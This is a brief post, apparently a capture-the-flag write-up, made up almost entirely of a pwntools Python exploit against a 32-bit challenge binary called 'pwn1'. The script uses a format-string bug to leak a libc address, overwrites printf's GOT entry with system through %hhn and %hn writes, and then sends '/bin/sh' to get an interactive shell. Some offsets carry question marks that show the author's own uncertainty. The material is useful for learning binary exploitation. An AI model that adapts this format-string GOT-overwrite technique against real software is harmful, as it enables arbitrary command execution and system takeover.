
Exploit analysis

Date: 2017-12-13 00:02:05      Views: 233      Comments: 0      Favorites: 0


```python
from pwn import *

local = 1
debug = 1

if local:
    p = process("./pwn1")
else:
    p = remote("127.0.0.1", 8080)

# context.log_level = 'debug'
'''
if debug:
    gdb.attach(p)
'''

def fms(data):
    # menu option 1 asks for a name; that input is the format string
    p.recvuntil("input$", timeout=4)
    p.sendline("1")
    p.recvuntil("please input your name:\n")
    p.sendline(data)


libc = ELF("/lib/i386-linux-gnu/libc.so.6")
elf = ELF("./pwn1")

# leak a stack value to locate libc
fms("%35$p")

libc_start_main_addr = int(p.recv(10), 16) - 243    # __libc_start_main ?
libc_addr = libc_start_main_addr - libc.symbols["__libc_start_main"]  # ?
print("libc_addr =", hex(libc_addr))

printf_got = elf.got["printf"]  # GOT entry address (writable only without Full RELRO)
print("printf_got =", hex(printf_got))

system_addr = libc_addr + libc.symbols["system"]  # symbols['system'] function address
print("system_addr =", hex(system_addr))
# ELF module
# make stack
make_stack = b"a" * 0x30 + p32(printf_got) + p32(printf_got + 0x1)
fms(make_stack)
# gdb.attach(p)

payload = "%" + str(system_addr & 0x000000FF) + "x%18$hhn"
payload += "%" + str(((system_addr & 0x00FFFF00) >> 8) - (system_addr & 0x000000FF)) + "x%19$hn"
print("payload=", payload)

fms(payload)
fms(b"/bin/sh\x00")
p.interactive()
```

 


Original source: http://www.cnblogs.com/liuyimin/p/8029855.html
